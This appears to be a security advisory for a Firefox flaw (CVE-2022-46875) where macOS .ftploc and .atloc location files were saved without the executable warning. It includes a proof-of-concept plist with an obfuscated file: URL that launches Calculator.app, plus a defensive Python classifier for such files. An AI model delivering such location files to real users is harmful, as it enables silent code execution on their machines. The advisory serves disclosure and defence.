Summary
Mozilla Firefox did not show its executable-file warning when a user downloaded a .atloc or .ftploc file. On macOS these are Finder location files, and one that carries a file: URL pointing at a local application launches that application when opened, so a download that looks like a harmless link file can run commands on the user's computer.
Credit
Dohyun Lee, working for SSD Labs Korea.
CVE
CVE-2022-46875
Vendor Response
The vendor has released a fix; details are in the Mozilla Foundation Security Advisory at: https://www.mozilla.org/en-US/security/advisories/mfsa2022-51/
Technical Analysis
Firefox keeps a list of file extensions it treats as executable and shows a warning before saving a download with one of them. The list covered .inetloc (macOS Internet location) files but not .ftploc and .atloc, two other macOS Finder location-file extensions. A location file is a plist whose URL key Finder dispatches when the file is opened; when that URL is a file: URL to an application bundle, opening the file launches the application, so these extensions are equivalent to executables. An attacker could therefore serve a .ftploc or .atloc file that Firefox saves without any warning, making a dangerous file look harmless.
PoC
poc.ftploc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
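The following is an added example, not code from the advisory or from Firefox. It shows the check a download-warning layer needs: match the location-file extension case-insensitively, then parse the plist and normalise the embedded URL so that a mixed-case scheme ("FiLe:") and a padded run of slashes, as in the PoC above, still resolve to the local application path. The extension list, the PoC bytes and the benign sample are assumptions constructed for the example; only .ftploc and .atloc are taken from the advisory.

```python
"""Classify macOS Finder "location" files for a download-warning check.

Added example, not Firefox's code. Assumptions are marked in comments.
"""
import plistlib
import re

# Extensions of macOS Finder location files. Finder opens them by dispatching the
# embedded URL, so one carrying a file: URL to a .app bundle acts as a launcher.
# Assumption: this is the set a download warning should cover; the advisory only
# establishes that .ftploc and .atloc were missing from Firefox's list.
LOCATION_EXTS = frozenset({"inetloc", "webloc", "ftploc", "atloc", "afploc"})

# Constructed sample: the PoC from this advisory, as bytes.
POC_FTPLOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
"""

# Constructed sample: a benign .ftploc that really points at an FTP server.
BENIGN_FTPLOC = plistlib.dumps({"URL": "ftp://ftp.example.org/pub/"})


def extension(filename):
    """Lower-cased final extension, so 'Poc.FTPLOC' and 'x.tar.atloc' both match."""
    name = filename.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def is_location_file(filename):
    return extension(filename) in LOCATION_EXTS


def embedded_url(data):
    """Return the URL string from a location-file plist, or None if it is not one."""
    try:
        plist = plistlib.loads(data)
    except Exception:
        return None
    url = plist.get("URL") if isinstance(plist, dict) else None
    return url if isinstance(url, str) else None


def normalise_url(url):
    """Split a URL into (scheme, target) so case games and slash padding cannot hide a file: URL.

    The scheme is lower-cased ('FiLe:' is 'file:'), and for file: URLs any run of
    slashes after the scheme is collapsed to a single absolute path, which is
    the local path the PoC's 'FiLe:////...' actually names.
    """
    m = re.match(r"^\s*([A-Za-z][A-Za-z0-9+.-]*):(.*)$", url, re.S)
    if not m:
        return ("", url)
    scheme, rest = m.group(1).lower(), m.group(2)
    if scheme == "file":
        return (scheme, "/" + rest.lstrip("/"))
    return (scheme, rest)


def classify(filename, data):
    """Decide whether a downloaded file should get the executable-file warning.

    'warn' is True for every location-file extension, mirroring a fix that adds
    the extensions to the executable list. 'local_target' additionally tells a
    triager whether the payload points at a local path (the PoC case).
    """
    result = {"filename": filename, "location_file": is_location_file(filename),
              "scheme": None, "target": None, "local_target": False, "warn": False}
    if not result["location_file"]:
        return result
    result["warn"] = True
    url = embedded_url(data)
    if url is not None:
        scheme, target = normalise_url(url)
        result["scheme"], result["target"] = scheme, target
        result["local_target"] = scheme == "file"
    return result


if __name__ == "__main__":
    for name, data in [("poc.ftploc", POC_FTPLOC), ("poc.atloc", POC_FTPLOC),
                       ("mirror.ftploc", BENIGN_FTPLOC), ("notes.txt", b"hello")]:
        print(classify(name, data))
```

The extension check alone is what closes the gap the advisory describes; the URL normalisation is there because an extension list is only as good as the next extension nobody thought of, and inspecting the payload gives a second signal that does not depend on the name.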